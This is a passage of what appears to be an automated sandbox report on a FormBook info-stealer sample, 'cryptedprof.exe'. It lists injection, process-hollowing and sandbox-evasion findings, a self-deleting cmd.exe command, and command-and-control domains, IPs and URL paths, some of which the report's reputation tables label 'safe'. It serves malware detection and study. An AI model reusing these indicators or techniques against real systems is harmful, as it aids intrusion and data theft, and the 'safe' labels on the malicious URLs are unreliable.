          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04764015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04764015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04717016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04717016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04717016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0476740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0476740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0476740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046958EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047514FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04768CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04699080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04713884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04713884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0469C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0469B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0469B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04713540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04768D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0471A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0475E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0469AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04699100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04699100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04699100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04748DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0469B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0469B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0469B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0475FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0475FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0475FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0475FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047241E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047169A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04692D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04692D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04692D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04692D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04692D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046BC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 111.221.46.49 80
          Source: C:\Windows\explorer.exeNetwork Connect: 168.206.81.138 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\cryptedprof.exeSection loaded: unknown target: C:\Users\user\Desktop\cryptedprof.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\cryptedprof.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\cryptedprof.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\cryptedprof.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\cryptedprof.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\cryptedprof.exeThread register set: target process: 3440
          Source: C:\Users\user\Desktop\cryptedprof.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\cryptedprof.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\cryptedprof.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: 180000
          Source: C:\Users\user\Desktop\cryptedprof.exeProcess created: C:\Users\user\Desktop\cryptedprof.exe 'C:\Users\user\Desktop\cryptedprof.exe'
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\cryptedprof.exe'
          Source: explorer.exe, 00000005.00000000.351832152.00000000083EB000.00000004.00000001.sdmp, msdt.exe, 00000007.00000002.591709948.0000000002F20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.338761645.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000007.00000002.591709948.0000000002F20000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.338761645.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000007.00000002.591709948.0000000002F20000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.338761645.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000007.00000002.591709948.0000000002F20000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionAccess Token Manipulation1Rootkit1Credential API Hooking1Security Software Discovery131Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsProcess Injection512Virtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Access Token Manipulation1Security Account ManagerProcess Discovery3SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing12DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 356722 Sample: cryptedprof.exe Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 38 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 5 other signatures 2->44 10 cryptedprof.exe 19 2->10         started        process3 file4 28 C:\Users\user\AppData\Local\...\System.dll, PE32 10->28 dropped 30 C:\Users\user\AppData\Local\Temp\8chdn.dll, PE32 10->30 dropped 54 Detected unpacking (changes PE section rights) 10->54 56 Maps a DLL or memory area into another process 10->56 58 Tries to detect virtualization through RDTSC time measurements 10->58 14 cryptedprof.exe 10->14         started        signatures5 process6 signatures7 60 Modifies the context of a thread in another process (thread injection) 14->60 62 Maps a DLL or memory area into another process 14->62 64 Sample uses process hollowing technique 14->64 66 Queues an APC in another process (thread injection) 14->66 17 explorer.exe 14->17 injected process8 dnsIp9 32 tabandolano.online 111.221.46.49, 49753, 80 READYSERVER-SGREADYSERVERPTELTDSG Singapore 17->32 34 thatlocaljawn.com 34.102.136.180, 49746, 80 GOOGLEUS United States 17->34 36 3 other IPs or domains 17->36 46 System process connects to network (likely due to code injection or exploit) 17->46 21 msdt.exe 17->21         started        signatures10 process11 signatures12 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          cryptedprof.exe27%ReversingLabsWin32.Trojan.Generic
          cryptedprof.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsl227.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsl227.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.0.cryptedprof.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.2.cryptedprof.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          3.0.cryptedprof.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          7.2.msdt.exe.4b9f834.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          3.1.cryptedprof.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.msdt.exe.4e4cf8.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          3.2.cryptedprof.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.cryptedprof.exe.2a60000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.tabandolano.online/rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.warungsuntik.com/rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk0%Avira URL Cloudsafe
          www.warungsuntik.com/rcv/0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.tabandolano.online/cgi-sys/suspendedpage.cgi?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNv0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
